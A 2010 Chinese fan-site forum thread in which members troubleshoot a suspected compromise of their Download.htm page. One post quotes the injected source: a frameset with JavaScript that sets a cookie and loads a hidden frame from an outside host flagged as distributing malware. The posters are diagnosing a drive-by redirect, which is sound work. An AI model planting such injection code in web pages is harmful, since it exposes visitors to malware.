标题:
服务器被入侵了吗?
[打印本页]
作者:
希望高达
时间:
2010-5-23 20:26
标题:
服务器被入侵了吗?
今天更新了Download列表但是发现不论如何通过FTP上传覆盖,在浏览器浏览时源代码都会被改写。
现在Download.htm已经是被改写的页面了,各位不要去点击
是木马么?
作者:
starrain
时间:
2010-5-23 22:14
啊??我看看~
作者:
starrain
时间:
2010-5-23 22:18
从我这边看好好的呀,Download.htm的源文件也没发现问题sm34
作者:
希望高达
时间:
2010-5-23 22:20
http://www.srw00.com/hopegundam/Download.htm
这个页面?
源文件被改成了这样:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://zleiuk20.3322.org:89/jav/lz002.htm";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/hopegundam/Download.htm?UpdatedPage=aGlqYWNr">
<frame name="hi" src="">
</frameset>
</html>
作者:
starrain
时间:
2010-5-23 22:20
君本来写的是怎样的?
作者:
希望高达
时间:
2010-5-23 22:22
一大坨的table,一行tr对应一个下载表
上传一个最新的Download.htm
[
本帖最后由 希望高达 于 2010-5-23 22:25 编辑
]
作者:
starrain
时间:
2010-5-23 22:26
奇怪,功能完全没受影响,访问也没发现有不明进程……
君看看文件大小变了没?
作者:
希望高达
时间:
2010-5-23 22:27
从FTP上看文件大小没变,但是从浏览器访问页面,源代码就成了这个4kb的奇怪文件
你那里从浏览器上看Download.htm正常吗?
作者:
starrain
时间:
2010-5-23 22:31
啊!现在完全正常了,连源文件也和君写的一样了。
刚才确实变成了一个简单文件……难道HTM有什么我们不明的习性sm32
作者:
starrain
时间:
2010-5-23 22:33
安心,明天请小肥君分析一下4楼这个简单页面。
莫非是3322这个统计站点有问题?
作者:
希望高达
时间:
2010-5-23 22:34
你那边恢复了?我这边还没恢复啊……
你多刷新几次看看?
我怀疑服务器的IIS不正常……
作者:
希望高达
时间:
2010-5-23 22:37
http://zleiuk20.3322.org:89/jav/lz002.htm
这个页面,使用Chrome连接过去的时候会提示该站点已被Google认定为“可能包含恶意软件”页面
以前一直用这个统计站点的?会不会是这个统计站点的js脚本被人下了药?
作者:
starrain
时间:
2010-5-24 00:21
很有可能,以前就遇到过CNZZ被挂马的情况。
作者:
starrain
时间:
2010-5-24 00:29
果然,用FRONTPAGE打开发现,页面变成框架形式,鉴于只有君的原页面和3322两个元素,因此基本可认为3322有问题。
这会打开源文件又变成那个简单文件了。
作者:
starrain
时间:
2010-5-24 00:44
确定了!是3322的问题,刷新大站页面的源文件很大几率会变成3322的框架。
甚至主页偶尔也会,几率比较小。
病毒可能未在页面储存,也没有改动页面,只是从外部跟踪页面而已。可能还跟踪上级域名。
欢迎光临 机战联盟论坛 (http://bbs.srw00.com/)
Powered by Discuz! 6.0.0
